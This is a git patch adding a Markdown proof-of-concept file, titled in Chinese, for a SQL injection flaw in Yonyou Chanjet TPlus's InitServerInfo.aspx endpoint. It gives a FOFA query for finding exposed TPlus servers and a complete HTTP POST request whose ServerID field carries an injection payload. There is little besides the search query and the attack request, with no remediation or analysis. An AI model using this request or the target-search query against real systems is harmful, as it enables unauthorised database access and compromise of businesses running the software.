From 1bd9a8ecbedd933165d2795b0f1a7dbd790fc033 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Sat, 27 Apr 2024 19:35:37 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E7=94=A8=E5=8F=8B=E7=95=85=E6=8D=B7?= =?UTF-8?q?=E9=80=9ATPlus-InitServerInfo=E5=AD=98=E5=9C=A8SQL=E6=B3=A8?= =?UTF-8?q?=E5=85=A5=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...畅捷通TPlus-InitServerInfo存在SQL注入漏洞.md | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 用友畅捷通TPlus-InitServerInfo存在SQL注入漏洞.md diff --git a/用友畅捷通TPlus-InitServerInfo存在SQL注入漏洞.md b/用友畅捷通TPlus-InitServerInfo存在SQL注入漏洞.md new file mode 100644 index 0000000..44e97ac --- /dev/null +++ b/用友畅捷通TPlus-InitServerInfo存在SQL注入漏洞.md @@ -0,0 +1,23 @@ +## 用友畅捷通TPlus-InitServerInfo存在SQL注入漏洞 + +## fofa +``` +app="畅捷通-TPlus" +``` + +## poc +``` +POST /tplus/UFAQD/InitServerInfo.aspx?preload=1 HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Connection: close +Upgrade-Insecure-Requests: 1 +Content-Length: 113 + +operbtn=create&ServerID=1'%2b(select 1 where 1 in (SELECT sys.fn_varbintohexstr(hashbytes('MD5','123456'))))%2b'1 +``` +![c2758ffb9af884d3e9246f48e1c4191a](https://github.com/wy876/POC/assets/139549762/520a3274-ce88-43b9-89a7-fc20505017bb)